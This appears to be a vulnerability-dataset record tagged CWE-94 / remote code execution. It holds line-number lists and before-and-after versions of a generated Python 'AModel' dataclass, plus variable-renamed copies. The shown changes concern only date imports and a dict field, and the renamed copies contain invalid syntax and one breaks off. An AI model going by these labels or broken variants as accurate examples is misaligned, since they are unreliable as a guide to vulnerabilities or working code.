140,
145,
154,
155,
159,
160,
166,
167,
172,
177,
178,
179,
180,
181,
182,
187,
197,
199,
200,
201,
202,
203,
204,
217,
220,
226,
233,
234,
235,
236,
237,
245,
248,
250,
251,
261,
267,
288,
291,
297,
315,
317,
318,
322,
323,
324,
326,
327,
339,
340,
356,
357,
377,
378,
385,
399,
400,
401,
403,
413,
421,
423,
424,
426,
427,
432,
433,
435,
436,
438,
443,
444,
446,
447,
450,
451,
457,
458,
459,
463,
464,
466,
470,
471,
475,
481,
490,
493,
498,
500,
504,
506,
507,
516,
537,
539,
540,
545,
546,
556,
569,
572,
580,
581,
584,
591,
593,
603,
605,
606,
609,
614,
616,
620,
627,
634,
635,
638,
646,
647,
648,
649,
650,
651,
652,
655,
658,
666,
667,
676,
677,
685,
686,
695,
706,
722,
724,
725,
728,
736,
739,
741,
751,
753,
754,
764,
766,
779,
782,
783,
784,
785,
786,
788,
790,
810,
812,
813,
816,
824,
827,
829,
839,
841,
842,
845,
852,
853,
854,
857,
859,
869,
871,
872,
880,
881,
882,
898,
901,
903,
904,
915,
917,
924,
925,
930,
931,
964,
965,
976,
977,
989,
993,
995,
1000,
1001,
1009,
1011,
1012,
1013,
1014,
1023,
1029,
1035,
1037,
1044,
1046,
1053,
1054,
1061,
1063,
1064,
1070,
1072,
1073,
1074,
1089,
1093,
1094,
1098,
1106,
1107,
1109,
1111,
1112,
1119,
1128,
1133,
1145,
1147,
1148,
1154,
1158,
1162,
1171,
1172,
1183,
1186,
1204,
1205,
1212,
1213,
1221,
1233,
1235,
1249,
1250,
1266,
1268,
1269,
1272,
1277,
1279,
1287,
1292,
1299,
1301,
1302,
1305,
1316,
1319,
1334,
1336,
1337,
1340,
1348,
1349,
1350,
1351,
1352,
1354,
1358,
1368,
1370,
1371,
1379,
1380,
1382,
1383,
1384,
1389,
1394,
1395,
1397,
1399,
1400,
1408,
1409,
1417,
1425,
1429,
1430,
1442,
1455,
1461,
1468,
1469,
1471,
1475,
1476,
1477,
1482,
1490,
1491,
1498,
1500,
1502,
1503,
1508,
1509,
1512,
1516,
1519,
1520,
1528,
1530,
1538,
1542,
1547,
1559,
1560,
1563,
1564,
1565,
1576,
1577,
1578,
1606,
1608,
1610,
1619,
1620,
1630,
1631,
1633,
1635,
1636,
1657,
1658,
1659,
1670,
1682,
1705,
1712,
1717,
1718,
1726,
1727,
1729,
1735,
1739,
1743,
1747,
1748,
1772,
1779,
1780,
1790,
1794,
1795,
1816,
1827,
1831,
1832,
1836,
1859,
1884,
1900,
1926,
1927,
1938,
1952,
1954,
1959,
1962,
1982,
1994,
1997,
2025,
2030,
2044,
2064,
2065,
2080,
2081,
2085,
2089,
2101,
2104,
2105,
2106,
2107,
2108,
2109,
2110,
2111,
2112,
2113,
2114,
2115,
2116,
2117,
2118,
2119,
2120,
2121,
2122,
2178,
2179,
2196,
2197,
2206,
2208,
2209,
2226,
2227,
2237,
2250,
2275,
2276,
2298,
2299,
2300,
2305,
2309,
2310,
2311,
2333,
2342,
2349,
2350,
2355,
2357,
2359,
2362,
2367,
2379,
2386,
2387,
2398,
2399,
2403,
2404,
2406,
2407,
2415,
2418,
2432,
2433,
2434,
2440,
2441,
2444,
2457,
2464,
2465,
2471,
2473,
2474,
2482,
2487,
2489,
2490,
2491,
2492,
2498,
2501,
2504,
2505,
2509,
2513,
2523,
2532,
2542,
2550,
2552,
2553,
2560,
2568,
2573,
2578,
2580,
2583,
2585,
2587,
2589,
2591,
2593,
2594,
2602,
2606,
2607,
2608,
2611,
2613,
2614,
2615,
2620,
2621,
2622,
2633,
2636,
2640,
2641,
2643,
2651,
2653,
2665,
2666,
2667,
2669,
2680,
2682,
2687,
2689,
2690,
2692,
2710,
2723,
2725,
2737,
2738,
2756,
2758,
2773,
2774,
2782,
2795,
2822,
2825,
2826,
2831,
2838,
2850,
2851,
2893,
2915,
2917,
2940,
2956,
2975,
2988,
3010,
3019,
3042,
3043,
3044,
3052,
3066,
3091,
3133,
3140,
3141,
3148,
3149,
3151,
3157,
3165,
3171,
3172,
3178,
3183,
3192,
3193,
3198,
3203,
3206,
3207,
3210,
3218,
3221,
3226,
3229,
3234,
3235,
3238,
3239,
3249,
3250,
3261,
3265,
3273,
3279,
3281,
3282,
3291,
3300,
3301,
3305,
3309,
3311,
3314,
3318,
3324,
3325,
3334,
3345,
3348,
3350,
3354,
3355,
3364,
3366,
3369,
3372,
3373,
3379,
3395,
3397,
3402,
3414,
3415,
3424,
3427,
3436,
3438,
3441,
3442,
3447,
3450,
3452,
3453,
3455,
3461,
3465,
3466,
3476,
3477,
3478,
3486,
3498,
3499,
3500,
3501,
3506,
3507,
3519,
3524,
3525,
3526,
3549,
3554,
3572,
3575,
3576,
3580,
3584,
3586,
3587,
3598,
3599,
3644,
3645,
3649,
3704,
3705,
3762,
3763,
3765,
3784,
3788,
3801,
3807,
3813,
3814,
3821,
3833,
3834,
3836,
3839,
3847,
3848,
3849,
3852,
3853,
3855,
3856,
3866,
3870,
3871,
3872,
3884,
3894,
3897,
3898,
3906,
3908,
3926,
3927,
3928,
3929,
3930,
3931,
3937,
3938,
3939,
3940,
3941,
3942,
3949,
3952,
3953,
3954,
3955,
3961,
3967,
3968,
3983,
3984,
3985,
3986,
3987,
3994,
4000,
4001,
4002,
4007,
4013,
4015,
4016,
4019,
4021,
4022,
4030,
4042,
4044,
4052,
4083,
4087,
4088,
4089,
4092,
4093,
4097,
4103,
4104,
4116,
4129,
4130,
4131,
4134,
4146,
4148,
4154,
4155,
4162,
4166,
4177,
4187,
4191,
4193,
4202,
4206,
4220,
4221,
4226,
4230,
4249,
4277,
4281,
4282,
4284,
4290,
4304,
4309,
4313,
4314,
4331,
4341,
4347,
4349,
4350,
4358,
4361,
4368,
4369,
4380,
4381,
4392,
4393,
4405,
4408,
4409,
4410,
4411,
4412,
4413,
4425,
4426,
4443,
4444,
4445,
4446,
4453,
4457,
4458,
4465,
4480,
4486,
4487,
4488,
4489,
4493,
4498,
4512,
4515,
4516,
4517,
4518,
4519,
4520,
4522,
4530,
4538,
4539,
4544,
4545,
4557,
4565,
4566,
4576,
4581,
4588,
4593,
4594,
4604,
4606,
4611,
4615,
4616,
4619,
4620,
4641,
4642,
4643,
4644,
4650,
4661,
4662,
4663,
4664,
4665,
4666,
4667,
4668,
4678,
4679,
4681,
4682,
4692,
4700,
4704,
4723,
4725,
4726,
4733,
4735,
4737,
4742,
4749,
4751,
4752,
4760,
4764,
4768,
4769,
4770,
4775,
4782,
4783,
4794,
4804,
4805,
4808,
4809,
4816,
4817,
4821,
4831,
4832,
4842,
4843,
4844,
4856,
4858,
4860,
4866,
4867,
4872,
4875,
4876,
4881,
4885,
4886,
4889,
4900,
4902,
4903,
4913,
4916,
4929,
4930,
4941,
4953,
4956,
4966,
4976,
4978,
4979,
4987,
4995,
5001,
5010,
20,
21,
22,
23,
142,
143,
144,
145,
146,
147,
148,
169,
170,
171,
172,
173,
174,
175,
206,
207,
208,
209,
210,
211,
212,
213,
214,
215,
216,
321,
330,
331,
332,
333,
334,
335,
342,
343,
344,
345,
346,
359,
360,
361,
362,
381,
382,
383,
384,
404,
405,
406,
407,
408,
409,
410,
411,
550,
551,
552,
553,
554,
555,
757,
758,
759,
760,
761,
762,
763,
764,
765,
874,
927,
967,
968,
969,
980,
981,
982,
983,
984,
1003,
1004,
1005,
1006,
1007,
1008,
1066,
1067,
1068,
1069,
1115,
1116,
1117,
1118,
1119,
1120,
1121,
1151,
1152,
1153,
1154,
1155,
1156,
1157,
1158,
1159,
1160,
1161,
1215,
1216,
1217,
1218,
1219,
1220,
1271,
1375,
1376,
1377,
1378,
1434,
1435,
1436,
1437,
1438,
1439,
1440,
1441,
1507,
1524,
1525,
1526,
1624,
1625,
1626,
1627,
1628,
1629,
1722,
1723,
1724,
1784,
1785,
1786,
1787,
1788,
1801,
1802,
1803,
1804,
2124,
2125,
2126,
2127,
2128,
2181,
2182,
2183,
2201,
2202,
2203,
2204,
2205,
2280,
2281,
2282,
2283,
2284,
2285,
2391,
2392,
2393,
2411,
2412,
2413,
2414,
2478,
2479,
2480,
2481,
2557,
2558,
2559,
2598,
2599,
2600,
2601,
2743,
2744,
2745,
2780,
2781,
2782,
2783,
2784,
2785,
2786,
2787,
2788,
2789,
2790,
2791,
2792,
2793,
3144,
3145,
3146,
3147,
3176,
3177,
3178,
3179,
3180,
3181,
3182,
3285,
3304,
3329,
3330,
3331,
3332,
3333,
3419,
3420,
3421,
3422,
3423,
3446,
3468,
3469,
3470,
3471,
3472,
3473,
3474,
3503,
3511,
3512,
3513,
3514,
3515,
3516,
3517,
3518,
3901,
3902,
3903,
3904,
3905,
3934,
3945,
3959,
3960,
3961,
3962,
3963,
3964,
4026,
4027,
4028,
4159,
4160,
4161,
4318,
4319,
4320,
4321,
4322,
4354,
4355,
4356,
4357,
4549,
4569,
4570,
4571,
4572,
4573,
4685,
4686,
4687,
4688,
4689,
4729,
4730,
4731,
4871,
4907,
4908,
4909,
4910,
4911,
4912,
4932,
4933,
4934,
4935,
4936,
4983,
4984,
4985,
4986,
222,
223,
224,
228,
229,
230,
231,
232,
263,
264,
265,
266,
267,
268,
269,
270,
271
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
24,
39,
41,
44,
48,
50,
67,
68,
80,
85,
87,
91,
93,
108,
125,
127,
132,
134,
136,
137,
138,
140,
141,
146,
155,
156,
160,
161,
167,
168,
173,
178,
179,
189,
190,
191,
192,
193,
194,
199,
209,
211,
212,
213,
214,
215,
216,
229,
232,
238,
245,
246,
247,
248,
249,
257,
260,
262,
263,
275,
281,
302,
305,
311,
329,
331,
332,
336,
337,
338,
340,
341,
354,
355,
371,
372,
392,
393,
400,
414,
415,
416,
418,
428,
436,
438,
439,
441,
442,
447,
448,
450,
451,
453,
458,
459,
461,
462,
465,
466,
472,
473,
474,
478,
479,
481,
485,
486,
490,
496,
505,
508,
513,
515,
519,
521,
522,
531,
553,
555,
556,
561,
562,
572,
585,
588,
596,
597,
600,
607,
609,
619,
621,
622,
625,
630,
632,
636,
643,
650,
651,
654,
662,
663,
664,
665,
666,
667,
668,
671,
674,
682,
683,
692,
693,
701,
702,
711,
722,
738,
740,
741,
744,
752,
755,
757,
767,
769,
770,
780,
782,
795,
798,
799,
800,
801,
802,
804,
806,
826,
828,
829,
832,
840,
843,
845,
855,
857,
858,
861,
868,
869,
870,
873,
875,
885,
887,
888,
896,
897,
898,
914,
917,
919,
920,
931,
933,
940,
941,
946,
947,
980,
981,
992,
993,
1005,
1009,
1011,
1016,
1017,
1025,
1027,
1028,
1029,
1030,
1039,
1045,
1051,
1053,
1060,
1062,
1069,
1070,
1077,
1079,
1080,
1086,
1088,
1089,
1090,
1105,
1109,
1110,
1114,
1122,
1123,
1125,
1127,
1128,
1135,
1144,
1149,
1161,
1163,
1164,
1170,
1174,
1178,
1187,
1188,
1199,
1202,
1220,
1221,
1228,
1229,
1237,
1249,
1251,
1265,
1266,
1282,
1284,
1285,
1288,
1293,
1295,
1303,
1308,
1315,
1317,
1318,
1321,
1332,
1335,
1350,
1352,
1353,
1356,
1364,
1365,
1366,
1367,
1368,
1370,
1374,
1384,
1386,
1387,
1395,
1396,
1398,
1399,
1400,
1405,
1410,
1411,
1413,
1415,
1416,
1424,
1425,
1433,
1441,
1445,
1446,
1458,
1471,
1477,
1484,
1485,
1487,
1491,
1492,
1493,
1498,
1506,
1507,
1514,
1516,
1518,
1519,
1524,
1525,
1528,
1532,
1535,
1536,
1544,
1546,
1554,
1558,
1563,
1575,
1576,
1579,
1580,
1581,
1592,
1593,
1594,
1622,
1624,
1626,
1635,
1636,
1646,
1647,
1649,
1651,
1652,
1673,
1674,
1675,
1686,
1698,
1721,
1728,
1733,
1734,
1742,
1743,
1745,
1751,
1755,
1759,
1763,
1764,
1788,
1795,
1796,
1806,
1810,
1811,
1832,
1843,
1847,
1848,
1852,
1875,
1900,
1916,
1942,
1943,
1954,
1968,
1970,
1975,
1978,
1998,
2010,
2013,
2041,
2046,
2060,
2080,
2081,
2096,
2097,
2101,
2105,
2117,
2120,
2121,
2122,
2123,
2124,
2125,
2126,
2127,
2128,
2129,
2130,
2131,
2132,
2133,
2134,
2135,
2136,
2137,
2138,
2194,
2195,
2212,
2213,
2222,
2224,
2225,
2242,
2243,
2253,
2266,
2291,
2292,
2314,
2315,
2316,
2321,
2325,
2326,
2327,
2349,
2358,
2365,
2366,
2371,
2373,
2375,
2378,
2383,
2395,
2402,
2403,
2414,
2415,
2419,
2420,
2422,
2423,
2431,
2434,
2448,
2449,
2450,
2456,
2457,
2460,
2473,
2480,
2481,
2487,
2489,
2490,
2498,
2503,
2505,
2506,
2507,
2508,
2514,
2517,
2520,
2521,
2525,
2529,
2539,
2548,
2558,
2566,
2568,
2569,
2576,
2584,
2589,
2594,
2596,
2599,
2601,
2603,
2605,
2607,
2609,
2610,
2618,
2622,
2623,
2624,
2627,
2629,
2630,
2631,
2636,
2637,
2638,
2649,
2652,
2656,
2657,
2659,
2667,
2669,
2681,
2682,
2683,
2685,
2696,
2698,
2703,
2705,
2706,
2708,
2726,
2739,
2741,
2753,
2754,
2772,
2774,
2789,
2790,
2798,
2811,
2838,
2841,
2842,
2847,
2854,
2866,
2867,
2890,
2892,
2915,
2931,
2950,
2963,
2985,
2994,
3017,
3018,
3019,
3027,
3041,
3066,
3108,
3115,
3116,
3123,
3124,
3126,
3132,
3140,
3146,
3147,
3153,
3158,
3167,
3168,
3173,
3178,
3181,
3182,
3185,
3193,
3196,
3201,
3204,
3209,
3210,
3213,
3214,
3224,
3225,
3236,
3240,
3248,
3254,
3256,
3257,
3266,
3275,
3276,
3280,
3284,
3286,
3289,
3293,
3299,
3300,
3309,
3320,
3323,
3325,
3329,
3330,
3339,
3341,
3344,
3347,
3348,
3354,
3370,
3372,
3377,
3389,
3390,
3399,
3402,
3411,
3413,
3416,
3417,
3422,
3425,
3427,
3428,
3430,
3436,
3440,
3441,
3451,
3452,
3453,
3461,
3473,
3474,
3475,
3476,
3481,
3482,
3494,
3499,
3500,
3501,
3524,
3529,
3547,
3550,
3551,
3555,
3559,
3561,
3562,
3573,
3574,
3619,
3620,
3624,
3679,
3680,
3737,
3738,
3740,
3759,
3763,
3776,
3782,
3788,
3789,
3796,
3808,
3809,
3811,
3814,
3822,
3823,
3824,
3827,
3828,
3830,
3831,
3841,
3845,
3846,
3847,
3859,
3869,
3872,
3873,
3881,
3883,
3901,
3902,
3903,
3904,
3905,
3906,
3912,
3913,
3914,
3915,
3916,
3917,
3924,
3927,
3928,
3929,
3930,
3936,
3942,
3943,
3958,
3959,
3960,
3961,
3962,
3969,
3975,
3976,
3977,
3982,
3988,
3990,
3991,
3994,
3996,
3997,
4005,
4017,
4019,
4027,
4058,
4062,
4063,
4064,
4067,
4068,
4072,
4078,
4079,
4091,
4104,
4105,
4106,
4109,
4121,
4123,
4129,
4130,
4137,
4141,
4152,
4162,
4166,
4168,
4177,
4181,
4195,
4196,
4201,
4205,
4224,
4252,
4256,
4257,
4259,
4265,
4279,
4284,
4288,
4289,
4306,
4316,
4322,
4324,
4325,
4333,
4336,
4343,
4344,
4355,
4356,
4367,
4368,
4380,
4383,
4384,
4385,
4386,
4387,
4388,
4400,
4401,
4418,
4419,
4420,
4421,
4428,
4432,
4433,
4440,
4455,
4461,
4462,
4463,
4464,
4468,
4473,
4487,
4490,
4491,
4492,
4493,
4494,
4495,
4497,
4505,
4513,
4514,
4519,
4520,
4532,
4540,
4541,
4551,
4556,
4563,
4568,
4569,
4579,
4581,
4586,
4590,
4591,
4594,
4595,
4616,
4617,
4618,
4619,
4625,
4636,
4637,
4638,
4639,
4640,
4641,
4642,
4643,
4653,
4654,
4656,
4657,
4667,
4675,
4679,
4698,
4700,
4701,
4708,
4710,
4712,
4717,
4724,
4726,
4727,
4735,
4739,
4743,
4744,
4745,
4750,
4757,
4758,
4769,
4779,
4780,
4783,
4784,
4791,
4792,
4796,
4806,
4807,
4817,
4818,
4819,
4831,
4833,
4835,
4841,
4842,
4847,
4850,
4851,
4856,
4860,
4861,
4864,
4875,
4877,
4878,
4888,
4891,
4904,
4905,
4916,
4928,
4931,
4941,
4951,
4953,
4954,
4962,
4970,
4976,
4985,
20,
21,
22,
23,
143,
144,
145,
146,
147,
148,
149,
170,
171,
172,
173,
174,
175,
176,
181,
182,
183,
184,
185,
218,
219,
220,
221,
222,
223,
224,
225,
226,
227,
228,
335,
344,
345,
346,
347,
348,
349,
357,
358,
359,
360,
361,
374,
375,
376,
377,
396,
397,
398,
399,
419,
420,
421,
422,
423,
424,
425,
426,
566,
567,
568,
569,
570,
571,
773,
774,
775,
776,
777,
778,
779,
780,
781,
890,
943,
983,
984,
985,
996,
997,
998,
999,
1000,
1019,
1020,
1021,
1022,
1023,
1024,
1082,
1083,
1084,
1085,
1131,
1132,
1133,
1134,
1135,
1136,
1137,
1167,
1168,
1169,
1170,
1171,
1172,
1173,
1174,
1175,
1176,
1177,
1231,
1232,
1233,
1234,
1235,
1236,
1287,
1391,
1392,
1393,
1394,
1450,
1451,
1452,
1453,
1454,
1455,
1456,
1457,
1523,
1540,
1541,
1542,
1640,
1641,
1642,
1643,
1644,
1645,
1738,
1739,
1740,
1800,
1801,
1802,
1803,
1804,
1817,
1818,
1819,
1820,
2140,
2141,
2142,
2143,
2144,
2197,
2198,
2199,
2217,
2218,
2219,
2220,
2221,
2296,
2297,
2298,
2299,
2300,
2301,
2407,
2408,
2409,
2427,
2428,
2429,
2430,
2494,
2495,
2496,
2497,
2573,
2574,
2575,
2614,
2615,
2616,
2617,
2759,
2760,
2761,
2796,
2797,
2798,
2799,
2800,
2801,
2802,
2803,
2804,
2805,
2806,
2807,
2808,
2809,
3119,
3120,
3121,
3122,
3151,
3152,
3153,
3154,
3155,
3156,
3157,
3260,
3279,
3304,
3305,
3306,
3307,
3308,
3394,
3395,
3396,
3397,
3398,
3421,
3443,
3444,
3445,
3446,
3447,
3448,
3449,
3478,
3486,
3487,
3488,
3489,
3490,
3491,
3492,
3493,
3876,
3877,
3878,
3879,
3880,
3909,
3920,
3934,
3935,
3936,
3937,
3938,
3939,
4001,
4002,
4003,
4134,
4135,
4136,
4293,
4294,
4295,
4296,
4297,
4329,
4330,
4331,
4332,
4524,
4544,
4545,
4546,
4547,
4548,
4660,
4661,
4662,
4663,
4664,
4704,
4705,
4706,
4846,
4882,
4883,
4884,
4885,
4886,
4887,
4907,
4908,
4909,
4910,
4911,
4958,
4959,
4960,
4961,
234,
235,
236,
240,
241,
242,
243,
244,
277,
278,
279,
280,
281,
282,
283,
284,
285
] |
5CWE-94
| from __future__ import annotations
from dataclasses import dataclass, field
from datetime import date, datetime
from typing import Any, Dict, List, Optional, Union, cast
from .an_enum import AnEnum
from .different_enum import DifferentEnum
@dataclass
class AModel:
""" A Model for testing all the ways custom objects can be used """
an_enum_value: AnEnum
a_camel_date_time: Union[datetime, date]
a_date: date
nested_list_of_enums: Optional[List[List[DifferentEnum]]] = field(
default_factory=lambda: cast(Optional[List[List[DifferentEnum]]], [])
)
some_dict: Optional[Dict[Any, Any]] = field(default_factory=lambda: cast(Optional[Dict[Any, Any]], {}))
def to_dict(self) -> Dict[str, Any]:
an_enum_value = self.an_enum_value.value
if isinstance(self.a_camel_date_time, datetime):
a_camel_date_time = self.a_camel_date_time.isoformat()
else:
a_camel_date_time = self.a_camel_date_time.isoformat()
a_date = self.a_date.isoformat()
if self.nested_list_of_enums is None:
nested_list_of_enums = None
else:
nested_list_of_enums = []
for nested_list_of_enums_item_data in self.nested_list_of_enums:
nested_list_of_enums_item = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
nested_list_of_enums_item_item = nested_list_of_enums_item_item_data.value
nested_list_of_enums_item.append(nested_list_of_enums_item_item)
nested_list_of_enums.append(nested_list_of_enums_item)
some_dict = self.some_dict
return {
"an_enum_value": an_enum_value,
"aCamelDateTime": a_camel_date_time,
"a_date": a_date,
"nested_list_of_enums": nested_list_of_enums,
"some_dict": some_dict,
}
@staticmethod
def from_dict(d: Dict[str, Any]) -> AModel:
an_enum_value = AnEnum(d["an_enum_value"])
def _parse_a_camel_date_time(data: Dict[str, Any]) -> Union[datetime, date]:
a_camel_date_time: Union[datetime, date]
try:
a_camel_date_time = datetime.fromisoformat(d["aCamelDateTime"])
return a_camel_date_time
except:
pass
a_camel_date_time = date.fromisoformat(d["aCamelDateTime"])
return a_camel_date_time
a_camel_date_time = _parse_a_camel_date_time(d["aCamelDateTime"])
a_date = date.fromisoformat(d["a_date"])
nested_list_of_enums = []
for nested_list_of_enums_item_data in d.get("nested_list_of_enums") or []:
nested_list_of_enums_item = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
nested_list_of_enums_item_item = DifferentEnum(nested_list_of_enums_item_item_data)
nested_list_of_enums_item.append(nested_list_of_enums_item_item)
nested_list_of_enums.append(nested_list_of_enums_item)
some_dict = d.get("some_dict")
return AModel(
an_enum_value=an_enum_value,
a_camel_date_time=a_camel_date_time,
a_date=a_date,
nested_list_of_enums=nested_list_of_enums,
some_dict=some_dict,
)
| from __future__ import annotations
import datetime
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Union, cast
from .an_enum import AnEnum
from .different_enum import DifferentEnum
@dataclass
class AModel:
""" A Model for testing all the ways custom objects can be used """
an_enum_value: AnEnum
some_dict: Dict[Any, Any]
a_camel_date_time: Union[datetime.datetime, datetime.date]
a_date: datetime.date
nested_list_of_enums: Optional[List[List[DifferentEnum]]] = field(
default_factory=lambda: cast(Optional[List[List[DifferentEnum]]], [])
)
def to_dict(self) -> Dict[str, Any]:
an_enum_value = self.an_enum_value.value
some_dict = self.some_dict
if isinstance(self.a_camel_date_time, datetime.datetime):
a_camel_date_time = self.a_camel_date_time.isoformat()
else:
a_camel_date_time = self.a_camel_date_time.isoformat()
a_date = self.a_date.isoformat()
if self.nested_list_of_enums is None:
nested_list_of_enums = None
else:
nested_list_of_enums = []
for nested_list_of_enums_item_data in self.nested_list_of_enums:
nested_list_of_enums_item = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
nested_list_of_enums_item_item = nested_list_of_enums_item_item_data.value
nested_list_of_enums_item.append(nested_list_of_enums_item_item)
nested_list_of_enums.append(nested_list_of_enums_item)
return {
"an_enum_value": an_enum_value,
"some_dict": some_dict,
"aCamelDateTime": a_camel_date_time,
"a_date": a_date,
"nested_list_of_enums": nested_list_of_enums,
}
@staticmethod
def from_dict(d: Dict[str, Any]) -> AModel:
an_enum_value = AnEnum(d["an_enum_value"])
some_dict = d["some_dict"]
def _parse_a_camel_date_time(data: Dict[str, Any]) -> Union[datetime.datetime, datetime.date]:
a_camel_date_time: Union[datetime.datetime, datetime.date]
try:
a_camel_date_time = datetime.datetime.fromisoformat(d["aCamelDateTime"])
return a_camel_date_time
except:
pass
a_camel_date_time = datetime.date.fromisoformat(d["aCamelDateTime"])
return a_camel_date_time
a_camel_date_time = _parse_a_camel_date_time(d["aCamelDateTime"])
a_date = datetime.date.fromisoformat(d["a_date"])
nested_list_of_enums = []
for nested_list_of_enums_item_data in d.get("nested_list_of_enums") or []:
nested_list_of_enums_item = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
nested_list_of_enums_item_item = DifferentEnum(nested_list_of_enums_item_item_data)
nested_list_of_enums_item.append(nested_list_of_enums_item_item)
nested_list_of_enums.append(nested_list_of_enums_item)
return AModel(
an_enum_value=an_enum_value,
some_dict=some_dict,
a_camel_date_time=a_camel_date_time,
a_date=a_date,
nested_list_of_enums=nested_list_of_enums,
)
| remote_code_execution | {
"code": [
"from datetime import date, datetime",
" a_camel_date_time: Union[datetime, date]",
" a_date: date",
" some_dict: Optional[Dict[Any, Any]] = field(default_factory=lambda: cast(Optional[Dict[Any, Any]], {}))",
" if isinstance(self.a_camel_date_time, datetime):",
" some_dict = self.some_dict",
" \"some_dict\": some_dict,",
" def _parse_a_camel_date_time(data: Dict[str, Any]) -> Union[datetime, date]:",
" a_camel_date_time: Union[datetime, date]",
" a_camel_date_time = datetime.fromisoformat(d[\"aCamelDateTime\"])",
" a_camel_date_time = date.fromisoformat(d[\"aCamelDateTime\"])",
" a_date = date.fromisoformat(d[\"a_date\"])",
" some_dict = d.get(\"some_dict\")",
" some_dict=some_dict,"
],
"line_no": [
4,
16,
17,
21,
26,
47,
54,
61,
62,
64,
69,
75,
87,
94
]
} | {
"code": [
"import datetime",
" some_dict: Dict[Any, Any]",
" a_camel_date_time: Union[datetime.datetime, datetime.date]",
" a_date: datetime.date",
" some_dict = self.some_dict",
" \"some_dict\": some_dict,",
" some_dict = d[\"some_dict\"]",
" def _parse_a_camel_date_time(data: Dict[str, Any]) -> Union[datetime.datetime, datetime.date]:",
" a_camel_date_time: Union[datetime.datetime, datetime.date]",
" a_camel_date_time = datetime.datetime.fromisoformat(d[\"aCamelDateTime\"])",
" a_camel_date_time = datetime.date.fromisoformat(d[\"aCamelDateTime\"])",
" a_date = datetime.date.fromisoformat(d[\"a_date\"])",
" some_dict=some_dict,"
],
"line_no": [
3,
16,
17,
18,
26,
51,
61,
63,
64,
66,
71,
77,
91
]
} | from __future__ import annotations
from dataclasses import .dataclass, field
from datetime import .date, datetime
from typing import Any, Dict, List, Optional, Union, cast
from .an_enum import AnEnum
from .different_enum import DifferentEnum
@dataclass
class CLASS_0:
VAR_1: AnEnum
VAR_5: Union[datetime, date]
VAR_2: date
VAR_6: Optional[List[List[DifferentEnum]]] = field(
default_factory=lambda: cast(Optional[List[List[DifferentEnum]]], [])
)
VAR_3: Optional[Dict[Any, Any]] = field(default_factory=lambda: cast(Optional[Dict[Any, Any]], {}))
def FUNC_0(self) -> Dict[str, Any]:
VAR_1 = self.an_enum_value.value
if isinstance(self.a_camel_date_time, datetime):
VAR_5 = self.a_camel_date_time.isoformat()
else:
VAR_5 = self.a_camel_date_time.isoformat()
VAR_2 = self.a_date.isoformat()
if self.nested_list_of_enums is None:
VAR_6 = None
else:
VAR_6 = []
for nested_list_of_enums_item_data in self.nested_list_of_enums:
VAR_7 = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
VAR_8 = nested_list_of_enums_item_item_data.value
VAR_7.append(VAR_8)
VAR_6.append(VAR_7)
VAR_3 = self.some_dict
return {
"an_enum_value": VAR_1,
"aCamelDateTime": VAR_5,
"a_date": VAR_2,
"nested_list_of_enums": VAR_6,
"some_dict": VAR_3,
}
@staticmethod
def FUNC_1(VAR_0: Dict[str, Any]) -> CLASS_0:
VAR_1 = AnEnum(VAR_0["an_enum_value"])
def FUNC_2(VAR_4: Dict[str, Any]) -> Union[datetime, date]:
VAR_5: Union[datetime, date]
try:
VAR_5 = datetime.fromisoformat(VAR_0["aCamelDateTime"])
return VAR_5
except:
pass
VAR_5 = date.fromisoformat(VAR_0["aCamelDateTime"])
return VAR_5
a_camel_date_time = FUNC_2(VAR_0["aCamelDateTime"])
VAR_2 = date.fromisoformat(VAR_0["a_date"])
VAR_6 = []
for nested_list_of_enums_item_data in VAR_0.get("nested_list_of_enums") or []:
VAR_7 = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
VAR_8 = DifferentEnum(nested_list_of_enums_item_item_data)
VAR_7.append(VAR_8)
VAR_6.append(VAR_7)
VAR_3 = VAR_0.get("some_dict")
return CLASS_0(
VAR_1=an_enum_value,
VAR_5=a_camel_date_time,
VAR_2=a_date,
VAR_6=nested_list_of_enums,
VAR_3=some_dict,
)
| from __future__ import annotations
import .datetime
from dataclasses import .dataclass, field
from typing import Any, Dict, List, Optional, Union, cast
from .an_enum import AnEnum
from .different_enum import DifferentEnum
@dataclass
class CLASS_0:
VAR_1: AnEnum
VAR_2: Dict[Any, Any]
VAR_5: Union[datetime.datetime, datetime.date]
VAR_3: datetime.date
VAR_6: Optional[List[List[DifferentEnum]]] = field(
default_factory=lambda: cast(Optional[List[List[DifferentEnum]]], [])
)
def FUNC_0(self) -> Dict[str, Any]:
VAR_1 = self.an_enum_value.value
VAR_2 = self.some_dict
if isinstance(self.a_camel_date_time, datetime.datetime):
VAR_5 = self.a_camel_date_time.isoformat()
else:
VAR_5 = self.a_camel_date_time.isoformat()
VAR_3 = self.a_date.isoformat()
if self.nested_list_of_enums is None:
VAR_6 = None
else:
VAR_6 = []
for nested_list_of_enums_item_data in self.nested_list_of_enums:
VAR_7 = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
VAR_8 = nested_list_of_enums_item_item_data.value
VAR_7.append(VAR_8)
VAR_6.append(VAR_7)
return {
"an_enum_value": VAR_1,
"some_dict": VAR_2,
"aCamelDateTime": VAR_5,
"a_date": VAR_3,
"nested_list_of_enums": VAR_6,
}
@staticmethod
def FUNC_1(VAR_0: Dict[str, Any]) -> CLASS_0:
VAR_1 = AnEnum(VAR_0["an_enum_value"])
VAR_2 = VAR_0["some_dict"]
def FUNC_2(VAR_4: Dict[str, Any]) -> Union[datetime.datetime, datetime.date]:
VAR_5: Union[datetime.datetime, datetime.date]
try:
VAR_5 = datetime.datetime.fromisoformat(VAR_0["aCamelDateTime"])
return VAR_5
except:
pass
VAR_5 = datetime.date.fromisoformat(VAR_0["aCamelDateTime"])
return VAR_5
a_camel_date_time = FUNC_2(VAR_0["aCamelDateTime"])
VAR_3 = datetime.date.fromisoformat(VAR_0["a_date"])
VAR_6 = []
for nested_list_of_enums_item_data in VAR_0.get("nested_list_of_enums") or []:
VAR_7 = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
VAR_8 = DifferentEnum(nested_list_of_enums_item_item_data)
VAR_7.append(VAR_8)
VAR_6.append(VAR_7)
